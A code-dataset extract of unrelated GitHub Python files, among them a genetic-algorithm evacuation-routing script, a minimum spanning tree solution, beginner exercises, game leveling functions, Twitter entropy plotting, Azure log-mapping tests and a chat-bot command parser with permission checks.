CV1=abs(Xijr.sum(axis=3)-Yijb.sum(axis=3)).sum(axis=(1,2)).reshape(Nind,1)\n\n # PPT式2\n preCV2 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV2[:, :] -= Yijb.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV2 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV2[q] += abs(preCV2[q][i])\n\n\n # PPT式3\n preCV3 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV3[:, :] -= Yijb.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV3 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV3[q][j] < 0:\n CV3[q] -= preCV3[q][j]\n\n # PPT式4\n preCV4 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV4[:, :] -= Xijr.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV4 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV4[q] += abs(preCV4[q][i])\n\n # PPT式5\n preCV5 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV5[:, :] -= Xijr.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV5 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV5[q][j] < 0:\n CV5[q] -= preCV5[q][j]\n\n # PPT式6 有问题 待修改\n # CV6 = np.zeros((Nind, 1), dtype=np.int)\n # for n in range(Nind):\n # for r in range(R-1):\n # tmpSum=0\n # for i in range(S):\n # for j in range(T):\n # tmpSum+=Xijr[n][i+Y][j+Y+S][r]-Xijr[n][i+Y][j+Y+S][r+1]\n # if tmpSum<0:\n # CV6[n]-=tmpSum\n\n #纸式1\n CV7 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for r in range(R-1):\n tmpSum=0\n for i in l:\n tmpSum += Xijr[n][i][j + Y][r] - Xijr[n][j + Y][i][r + 1]\n # if tmpSum!=0:\n CV7[n]+=abs(tmpSum)\n\n #纸式2\n CV8 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for r in range(R-1):\n tmpSum=0\n for i in range(S):\n tmpSum += Xijr[n][i+Y][j + Y+S][r] - Xijr[n][j + Y+S][i+Y][r + 1]\n if tmpSum<0:\n CV8[n]-=tmpSum\n\n #纸式3\n CV9 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for r in range(R):\n tmpSum=0\n for i in range(S):\n for j in range(T):\n tmpSum+=Xijr[n][i+Y][j+Y+S][r]\n if tmpSum>B:\n CV9[n]+=tmpSum-B\n\n # 纸式4\n CV10 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for b in range(B):\n tmpSum = 0\n for i in range(S):\n for j in range(T):\n tmpSum += Yijb[n][i + Y][j + Y + S][b]\n if tmpSum > R:\n CV10[n] += tmpSum - R\n\n # 纸式5\n CV11 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for i in l:\n CV11[n]+=abs(Xijr[n][i][j+Y][R-1])\n\n # 纸式6\n CV12 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for b in range(B):\n tmpSum=0\n for i in l:\n tmpSum+=Yijb[n][i][j+Y][b]-Yijb[n][j+Y][i][b]\n # if tmpSum!=0:\n CV12+=abs(tmpSum)\n\n # 纸式7\n CV13 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for b in range(B):\n tmpSum=0\n for i in range(S):\n tmpSum += Yijb[n][i+Y][j + Y+S][b] - Yijb[n][j + Y+S][i+Y][b]\n if tmpSum<0 or tmpSum>1:\n CV13[n]+=abs(tmpSum)\n\n pop.ObjV = np.max(TmaxMin, axis=1).reshape(Nind, 1) # 计算目标函数值,赋值给pop种群对象的ObjV属性\n pop.CV=np.hstack([CV1,CV2,CV3,CV4,CV5,CV7,CV8,CV9,CV10,CV11,CV12,CV13])\n\n print(pop.CV.sum()//NIND)\n\n\ndef initData():\n L = np.ones(3)\n U = np.zeros(3) #初始化\n while (L.sum() > U.sum()): #防止生成的数据本身无法满足救援条件\n B = random.randint(2, 5)\n R = random.randint(2, 5)\n S = random.randint(2, 5)\n T = random.randint(2, 5)\n d = np.random.randint(1, 11, size=(S, T))\n dStart = np.random.randint(1, 11, size=S)\n L = np.random.randint(1, 6, size=S)\n U = np.random.randint(1, 6, size=T)\n print('本次基因长度为 %d ,随机生成的变量值为:'%(S*T*B*R))\n print(' | S | T | B | R | ')\n print('---------------------------')\n print(\" | \", S, \" | \", T, \" | \", B, \" | \", R, \" | \")\n print('Source 与 Sink 间距离矩阵')\n print(d)\n print('Single Yard 与各个 Source 间距离矩阵')\n print(dStart)\n print('%d 个 Source 的待救援者人数分别为' % S)\n print(L)\n print('%d 个 Sink 的最大容量分别为' % T)\n print(U)\n\nif __name__ == '__main__':\n \"\"\"==============================随机生成原始数据==========================\"\"\"\n # initData()\n \"\"\"===============================实例化问题对象===========================\"\"\"\n problem = MyProblem() # 生成问题对象\n \"\"\"=================================种群设置==============================\"\"\"\n Encoding = 'RI' # 编码方式\n NIND = Nind # 种群规模\n Field = ea.crtfld(Encoding, problem.varTypes, problem.ranges, problem.borders) # 创建区域描述器\n population = ea.Population(Encoding, Field, NIND) # 实例化种群对象(此时种群还没被初始化,仅仅是完成种群对象的实例化)\n \"\"\"===============================算法参数设置=============================\"\"\"\n myAlgorithm = ea.soea_SEGA_templet(problem, population) # 实例化一个算法模板对象\n myAlgorithm.recOper = ea.Xovdp(XOVR=0.9, Parallel=True) # 设置交叉算子\n myAlgorithm.mutOper = ea.Mutinv(Pm=0.05, Parallel=True) # 设置变异算子\n\n # myAlgorithm = ea.soea_DE_rand_1_L_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm = ea.soea_DE_currentToBest_1_bin_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm.mutOper.F = 0.7 # 差分进化中的参数F\n # myAlgorithm.recOper.XOVR = 0.7 # 重组概率\n\n myAlgorithm.MAXGEN = 200 # 最大进化代数\n myAlgorithm.logTras = 1 # 设置每隔多少代记录日志,若设置成0则表示不记录日志\n myAlgorithm.verbose = True # 设置是否打印输出日志信息\n myAlgorithm.drawing = 1 # 设置绘图方式(0:不绘图;1:绘制结果图;2:绘制目标空间过程动画;3:绘制决策空间过程动画)\n \"\"\"===========================根据先验知识创建先知种群========================\"\"\"\n # prophetChrom = np.zeros([NIND,N * N * (B+R)],dtype=np.int)\n\n tmpProp1=np.zeros([N ,N ,B],dtype=np.int)\n tmpProp1[0][1][0]=tmpProp1[1][4][0]=tmpProp1[4][3][0]=tmpProp1[3][5][0]=tmpProp1[0][2][1]=tmpProp1[2][4][1]=tmpProp1[4][3][1]=tmpProp1[3][5][1]=tmpProp1[0][2][2]=tmpProp1[2][6][2]=tmpProp1[6][2][2]=tmpProp1[2][5][2]=tmpProp1[5][3][2]=tmpProp1[3][5][2]=1\n tmpProp2 = np.zeros([N, N, R], dtype=np.int)\n tmpProp2[0][1][0]=tmpProp2[1][4][1]=tmpProp2[2][4][1]=tmpProp2[2][6][1]=tmpProp2[6][2][2]=tmpProp2[2][5][3]=tmpProp2[5][3][4]=tmpProp2[3][5][5]=1\n tmpProp2[0][2][0]=tmpProp2[4][3][2]=tmpProp2[3][5][3]=2\n tmpProp=np.append(tmpProp1,tmpProp2)\n prophetChrom = np.stack([np.array(tmpProp) for _ in range(Nind)], axis=0)\n\n prophetPop=ea.Population(Encoding, Field, NIND,prophetChrom)\n myAlgorithm.call_aimFunc(prophetPop) # 计算先知种群的目标函数值及约束(假如有约束)\n \"\"\"==========================调用算法模板进行种群进化========================\"\"\"\n [BestIndi, population] = myAlgorithm.run(prophetPop) # 执行算法模板,得到最优个体以及最后一代种群\n # [BestIndi, population] = myAlgorithm.run() # 执行算法模板,得到最优个体以及最后一代种群\n BestIndi.save() # 把最优个体的信息保存到文件中\n \"\"\"=================================输出结果==============================\"\"\"\n print('评价次数:%s' % myAlgorithm.evalsNum)\n print('时间已过 %s 秒' % myAlgorithm.passTime)\n if BestIndi.sizes != 0:\n print('最优的目标函数值为:%s' % BestIndi.ObjV[0][0])\n print('最优的控制变量值为:')\n for i in range(BestIndi.Phen.shape[1]):\n print(BestIndi.Phen[0, i],end=\" \")\n print(\"\")\n # print('最优的i,j,b,r值为:')\n # print(' | b | r | i | j | ')\n # print('---------------------------')\n # Xijbr=BestIndi.Phen.reshape(3,3,3,3)\n # for b in range(B):\n # for r in range(R):\n # for i in range(S):\n # for j in range(T):\n # if(Xijbr[i][j][b][r]==1):\n # print(\" | \",b+1,\" | \",r+1,\" | \",i+1,\" | \",j+1,\" | \")\n else:\n print('没找到可行解。')","repo_name":"aspxcor/Optimization-Plan-for-Emergency-Evacuation-of-Personnel-Based-on-Optimization-Algorithm","sub_path":"Code/Problem1/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"70129675210","text":"def solution(n, costs):\n \n def find_set(x):\n if x != parent[x]:\n parent[x] = find_set(parent[x])\n return parent[x]\n \n costs.sort(key=lambda x: x[2])\n parent = list(range(n))\n count, cost = 0, 0\n for s, e, w in costs:\n s_root, e_root = find_set(s), find_set(e)\n if s_root != e_root:\n parent[e_root] = s_root\n cost += w\n count += 1\n if count >= n-1:\n break\n return cost","repo_name":"kylekim2123/Algorithm-with-Python","sub_path":"Programmers/Level3/섬연결하기.py","file_name":"섬연결하기.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13312522172","text":"\n# 3. multiple user input in dictionary using while loop\n\nuser_vacations = {}\n\nactive_polling = True\nprompt1 = \"what is your name? \"\nprompt2 = \"If you could visit one place in the world, where would you go? \"\nprompt3 = \"Would you like to continue for other? (yes | no) \"\nwhile active_polling:\n\tuser_name = input(prompt1.title())\n\tdream_vacation = input(prompt2.title())\n\t\n\tuser_vacations[user_name] = dream_vacation\n\t\n\trepeat = input(prompt3.title())\n\tif repeat == 'no':\n\t\tactive_polling = False\n\nprint(\"\\n----- RESULTS OF THE POLL ------\\n\")\nfor name, vacation in user_vacations.items():\n\tprint(name.title() + \" has a dream of visiting \" + vacation.title() + \".\")\n","repo_name":"huzaifabaloch/Python_Crash_Book_Exercises","sub_path":"Chap_7 - User Input And While Loop/7_10_dream_vacation.py","file_name":"7_10_dream_vacation.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38502336034","text":"\"\"\"\n Main script for application.\n\"\"\"\n\n__author__ = ['Bhavik Patel']\n__version__ = \"1.0.0\"\n\nfrom my_app import app\n\n\ndef main():\n # init main object\n print(\"Initializing script..\")\n obj = app.App()\n\n print(\"Running app..\")\n obj.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bhvikp/pyspark-skeleton","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22928962916","text":"from some_model import SomeModel\n\n\ndef predict_message_mood(\n message: str,\n model: SomeModel,\n bad_thresholds: float = 0.3,\n good_thresholds: float = 0.8,\n) -> str:\n score: float = model.predict(message)\n\n if good_thresholds > 1.0 or good_thresholds < 0.0:\n raise ValueError('good_thresholds must be in range [0.0 , 1.0]')\n\n if bad_thresholds > 1.0 or bad_thresholds < 0.0:\n raise ValueError('bad_thresholds must be in range [0.0 , 1.0]')\n\n if good_thresholds < bad_thresholds:\n raise ValueError('good_thresholds must be greater than bad_thresholds')\n\n if score < bad_thresholds:\n return 'неуд'\n elif score > good_thresholds:\n return 'отл'\n else:\n return 'норм'\n","repo_name":"genusB/made_advance_python","sub_path":"advance_07/predict_message_mood.py","file_name":"predict_message_mood.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2474574143","text":"\"\"\"\nFiona Wong\n\nMaddelin Maddelin\n\"\"\"\nfrom game_creation import ascii_art\n\n\ndef character_has_leveled(character: dict, level_chart: dict) -> bool:\n \"\"\"\n Return True if character has leveled up based on a dictionary of set level EXP, else False.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :param level_chart: a dictionary that contains the attainable levels and the EXP value required for each level\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :return: True if character has leveled up based on a dictionary of set level EXP, else False\n\n >>> test_character = {'Name': 'Hunter', 'Partner Name': 'Killua', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 0}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n False\n >>> test_character = {'Name': 'Raon', 'Partner Name': 'Gon', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 125}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n True\n \"\"\"\n result = False\n next_exp = level_chart[character['LEVEL'] + 1]\n if character['LEVEL'] and character['EXP'] >= next_exp:\n result = True\n return result\n\n\ndef display_level_chart() -> dict:\n \"\"\"\n Create and print a dictionary that contains the attainable levels and the EXP value required for each level.\n\n :postcondition: creates and prints a dictionary that contains the attainable levels and the EXP value required for\n each level.\n :return: a dictionary that contains the attainable levels and the EXP value required for each level\n\n >>> level_chart = display_level_chart()\n >>> level_chart\n {1: 100, 2: 200, 3: 300, 4: 400, 5: 500, 6: 600, 7: 700, 8: 800, 9: 900, 10: 1000}\n \"\"\"\n return {level: exp for level, exp in enumerate(range(100, 1100, 100), start=1)}\n\n\ndef execute_glow_up_protocol(character: dict) -> None:\n \"\"\"\n Display the corresponding ASCII art and increment the character level by 1 and HP by 100.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :postcondition: displays the corresponding ASCII art and increments the character level by 1 and HP by 100\n\n >>> test_character = {'Name': 'Jess', 'Partner Name': 'Bess', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 25}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n <BLANKLINE>\n Current Status:\n LEVEL: 2\n HP: 300\n EXP: 25\n <BLANKLINE>\n\n >>> test_character = {'Name': 'Hiu', 'Partner Name': 'Paus', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 3,\n ... 'HP': 1, 'EXP': 125}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n <BLANKLINE>\n Current Status:\n LEVEL: 4\n HP: 201\n EXP: 125\n <BLANKLINE>\n \"\"\"\n ascii_art.level_up_message()\n character['LEVEL'] += 1\n character['HP'] += 200\n print(f\"\\tCurrent Status:\\n\"\n f\"\\tLEVEL: {character['LEVEL']}\\n\"\n f\"\\tHP: {character['HP']}\\n\"\n f\"\\tEXP: {character['EXP']}\\n\")\n","repo_name":"Maddelin/revival-A4-1510","sub_path":"character_information/leveling.py","file_name":"leveling.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72762500808","text":"\"\"\"\nPlot the entropy of user usages by county.\n\n\"\"\"\n\nimport sys\nimport twitterproj\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef collect_data():\n count = sys.argv[1]\n style = sys.argv[2]\n normalized = bool(int(sys.argv[3]))\n\n ents = twitterproj.userentropy__counties(count, style, normalized=normalized)\n fn = \"userentropies_{0}_{1}_{2}.json\"\n if normalized:\n fn = fn.format(count, style, 'norm')\n else:\n fn = fn.format(count, style, 'nonorm')\n\n with open(fn, 'w') as f:\n json.dump(ents, f)\n\ndef plot():\n numTweets_count = json.load(open('userentropies_numTweets_count_norm.json'))\n numTweetsWithHashtags_count = json.load(open('userentropies_numTweetsWithHashtags_count_norm.json'))\n\n numTweets_count_nonorm = json.load(open('userentropies_numTweets_count_nonorm.json'))\n numTweetsWithHashtags_count_nonorm = json.load(open('userentropies_numTweetsWithHashtags_count_nonorm.json'))\n\n population = json.load(open('json/grids.counties.bot_filtered.respop72013.json'))\n\n counties = list(numTweets_count.keys())\n\n w = [numTweets_count[geoid] for geoid in counties]\n x = [numTweetsWithHashtags_count[geoid] for geoid in counties]\n y = [numTweets_count_nonorm[geoid] for geoid in counties]\n z = [numTweetsWithHashtags_count_nonorm[geoid] for geoid in counties]\n c = [population[geoid] for geoid in counties]\n\n #matplotlib.style.use('fivethirtyeight')\n import seaborn\n\n f, (ax1, ax2) = plt.subplots(1,2)\n ax1.scatter(w, x, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n cax = ax2.scatter(y, z, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n\n ax1.set_xlabel('Normalized User Entropy of Tweets')\n ax1.set_ylabel('Normalized User Entropy of Hashtagged Tweets')\n ax1.set_xlim(0.0001, 0.15)\n ax1.set_ylim(0.0001, 0.15)\n ax1.set_xscale('log')\n ax1.set_yscale('log')\n ax2.set_xlabel('User Entropy of Tweets')\n ax2.set_ylabel('User Entropy of Hashtagged Tweets')\n\n cb = f.colorbar(cax)\n cb.set_label(\"Log Population\")\n\n f.savefig('UserEntropyByCounty.pdf')\n\nplot()\n#collect_data()\n","repo_name":"chebee7i/twitter","sub_path":"scripts/userentropies.py","file_name":"userentropies.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"10893286819","text":"from random import *\r\n\r\ndef main():\r\n \r\n choice = input(\"Just 'p'orts, 'i'p, 't'ransmisisson, 's'tandards, or study 'e'verything?\")\r\n\r\n if choice.lower() == \"p\":\r\n flashcards = open(\"ports.txt\", \"r\")\r\n elif choice.lower() == \"i\":\r\n flashcards = open(\"ip.txt\")\r\n elif choice.lower() == \"t\":\r\n flashcards = open(\"transmission.txt\")\r\n elif choice.lower() == \"s\":\r\n flashcards = open(\"standards.txt\")\r\n else:\r\n flashcards = open(\"flashcards.txt\", \"r\")\r\n\r\n flashDict = {}\r\n flashKeys = []\r\n wrongKeys = []\r\n done = False\r\n count = 0\r\n\r\n for card in flashcards:\r\n question, answer = card.split(\",\")\r\n answer = answer.strip(\"\\n\")\r\n flashDict[question] = answer.lower()\r\n\r\n for key in flashDict.keys():\r\n flashKeys.append(key)\r\n\r\n for i in range(len(flashKeys) - 1):\r\n num = randrange(0, (len(flashKeys) - 1))\r\n flashKeys[i], flashKeys[num] = flashKeys[num], flashKeys[i]\r\n\r\n for question in flashKeys:\r\n questionStr = question + \": \"\r\n answer = input(questionStr)\r\n\r\n if answer.lower() in flashDict[question]:\r\n print(\"CORRECT!\\n\")\r\n count = count + 1\r\n else:\r\n print(\"Incorrect! Answer: \", flashDict[question], \"\\n\")\r\n wrongKeys.append(question)\r\n \r\n print(\"You got: \", count, \"correct out of \", len(flashDict))\r\n print(\"Work on: \")\r\n\r\n for key in wrongKeys:\r\n print(key)\r\n \r\nmain()\r\n","repo_name":"duncan-mcfarland/flashcards","sub_path":"NetworkPlus.py","file_name":"NetworkPlus.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16015299861","text":"from logs_ingest.mapping import extract_resource_id_attributes, RESOURCE_ID_ATTRIBUTE, SUBSCRIPTION_ATTRIBUTE, \\\n RESOURCE_GROUP_ATTRIBUTE, RESOURCE_TYPE_ATTRIBUTE, RESOURCE_NAME_ATTRIBUTE\n\n\ndef test_extract_resource_id_simple_resource_id():\n run_successful_extraction_test(\n resource_id=\"subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-adagze/providers/Microsoft.Maps/accounts/maps-hackaton-test\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-adagze\",\n expected_resource_type=\"Microsoft.Maps/accounts\",\n expected_resource_name=\"maps-hackaton-test\"\n )\n\n\ndef test_extract_resource_id_attributes_nested_resource_type():\n run_successful_extraction_test(\n resource_id=\"/subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-jelpet\",\n expected_resource_type=\"Microsoft.NetApp/netAppAccounts/capacityPools\",\n expected_resource_name=\"cappool-jelpet-just-trying\"\n )\n\n\ndef test_extract_resource_id_attributes_invalid_resource_id():\n result_dict = {}\n resource_id = \"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\"\n extract_resource_id_attributes(result_dict, resource_id)\n assert result_dict == {RESOURCE_ID_ATTRIBUTE: resource_id}\n\n\ndef run_successful_extraction_test(\n resource_id: str,\n expected_subscription: str,\n expected_resource_group: str,\n expected_resource_type: str,\n expected_resource_name: str\n):\n result_dict = {}\n extract_resource_id_attributes(result_dict, resource_id)\n assert result_dict[SUBSCRIPTION_ATTRIBUTE].casefold() == expected_subscription.casefold()\n assert result_dict[RESOURCE_GROUP_ATTRIBUTE].casefold() == expected_resource_group.casefold()\n assert result_dict[RESOURCE_TYPE_ATTRIBUTE].casefold() == expected_resource_type.casefold()\n assert result_dict[RESOURCE_NAME_ATTRIBUTE].casefold() == expected_resource_name.casefold()\n","repo_name":"dynatrace-oss/dynatrace-azure-log-forwarder","sub_path":"tests/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"16"} +{"seq_id":"32428544591","text":"#Replace all occurences of BLANK with appropriate terms in the code below to make it work!\nclass Course:\n def __init__(self, number, name):\n self._name = name\n self._number = number\n\n def get_name(self):\n return self._name\n\nclass Instructor:\n \"\"\"\n Class for a Instructor Object that can teach courses\n \"\"\"\n def __init__(self, name):\n print(\"Initializing Instructor object for name \", name)\n self._name = name\n #_courses_enrolled will be the data member which is a collection of objects\n self._courses_enrolled = []\n\n def teach_course(self, class_name):\n print(\"Teaching course\", class_name.get_name())\n #add course to the _courses_enrolled collection\n self._courses_enrolled.append(class_name)\n\n def print_courses(self):\n print(\"Courses this Instructor is going to teach: \")\n for course in self._courses_enrolled:\n print(course.get_name())\n\n#create objects\ninstructor_1 = Instructor(\"ABC\")\ncs161_course = Course(\"CS161\", \"Introduction to Computer Science I\")\ncs162_course = Course(\"CS162\", \"Introduction to Computer Science II\")\n\n#now call methods\ninstructor_1.teach_course(cs161_course)\ninstructor_1.teach_course(cs162_course)\ninstructor_1.print_courses()\n\n#Debug and fix this piece of code to make it work\n\nclass Course:\n def __init__(self, number, name):\n self._name = name\n self._number = number\n\n def get_name(self):\n return self._name\n\ncs161_course = Course(\"CS161\", \"Introduction to Computer Science I\")\ncs162_course = Course(\"CS162\", \"Introduction to Computer Science II\")\n\nlist_of_courses = {cs161_course, cs162_course}\n\ndictionary_of_courses = {\"CS161\":cs161_course, \"CS162\": cs162_course}\nprint(dictionary_of_courses['CS161'].get_name())\nprint(dictionary_of_courses['CS162'].get_name())","repo_name":"BrianDy255/HelloWorld","sub_path":"CS 161/Week 10/Exploration Objects Inside Collections Exercise.py","file_name":"Exploration Objects Inside Collections Exercise.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70027054410","text":"import cv2\nimport os\nfrom PIL import Image\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n# location of dataset \n#video_path = '/c3d/C3D-Action-Recognition/datasets/ucf-101/'\nvideo_path = './datasets/ucf-101/'\nlabelnum=-1\nlabellist=[]\naction_list = os.listdir(video_path)\n# split dataset into train test and classifcation parts\nf1 = open('./ucfTrainTestlist/train_file.txt', 'w')\nf2 = open('./ucfTrainTestlist/test_file.txt', 'w')\nf3 = open('./ucfTrainTestlist/classInd.txt', 'w')\n#f1 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/train_file.txt', 'w')\n#f2 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/test_file.txt', 'w')\n#f3 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/classInd.txt', 'w')\nfor action in action_list:\n video_list = os.listdir(video_path+action)\n prefixlist=[]\n labelnum+=1\n for video in video_list:\n prefix = video.split('.avi')[0] # if see first '.' then split the string\n if video.find('v_',0) == 0:\n prefix = prefix.replace('v_','')\n prefixlist.append(prefix)\n #label = prefix.split('_')[0]\n #print(label) \n \"\"\"\n if label not in labellist:\n labellist.append(label)\n labelnum+=1\n #print(prefix)\n f1.write(prefix+' '+str(labelnum)+'\\n')\n \"\"\"\n prefixlen=len(prefixlist)\n \n train = 0.8\n for i in range(int(prefixlen*0.8)):\n f1.write(prefixlist[i]+' '+str(labelnum)+'\\n')\n for i in range(int(prefixlen*0.8),prefixlen):\n f2.write(prefixlist[i]+' '+str(labelnum)+'\\n')\ni=1\nfor action in action_list:\n f3.write(str(i)+' '+action+'\\n')\n i+=1\n\"\"\"\n if not os.path.exists(save_path+action+'/'+prefix):\n os.mkdir(save_path+action+'/'+prefix)\n save_name = save_path + action + '/' + prefix + '/'\n #save_name = save_path + prefix + '/'\n video_name = video_path+action+'/'+video\n #print(video_name)\n name = video_name.split('.')[1]\n #print(name)\n\"\"\"\n","repo_name":"CHI-YU-SUNG/C3D-Action-Recognition","sub_path":"video2list.py","file_name":"video2list.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"16351775631","text":"from util import *\nimport commands\nimport admin\n\n\ndef perm_check(cmd, userid):\n return connect().execute('''\n SELECT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n ) OR NOT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :b AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid) OR\n (rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid != :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n )\n ''', {'cmd': cmd, 'userid': userid, 'w': PERM_W, 'b': PERM_B}).fetchone()[0]\n\n\ndef parse(bot, txt, buf, msg, is_ext=False):\n # silently ignore rate-limited users\n if msg.from_user.id != admin.userid and bot.ratelimit.get(msg.from_user.id, 0) >= commands.rate_threshold: return\n\n idx = 0\n part = ''\n parts = []\n parse = True\n total_rate = 0\n\n while idx <= len(txt):\n if not parse:\n part += ('' if txt[idx] in '\\\\|' else '\\\\') + txt[idx]\n parse = True\n elif idx == len(txt) or (is_ext and txt[idx] == '|'):\n part = connect().execute('''\n SELECT dest || substr(:s, length(src)+1) FROM alias\n WHERE :s = src OR :s LIKE src || ' %'\n UNION ALL SELECT :s\n ''', {'s': part.strip()}).fetchone()[0]\n cmd, args = part.split(None, 1) if ' ' in part or '\\n' in part else (part, None)\n if not hasattr(commands, 'cmd_'+cmd):\n return f'The command {cmd} does not exist.'\n if not perm_check(cmd, msg.from_user.id):\n return f'You do not have permission to execute the {cmd} command.'\n total_rate += commands.rate_penalty[int(commands.info[cmd]['weight'])]\n parts.append((getattr(commands, 'cmd_'+cmd), args))\n part = ''\n elif is_ext and txt[idx] == '\\\\': parse = False\n else: part += txt[idx]\n idx += 1\n\n 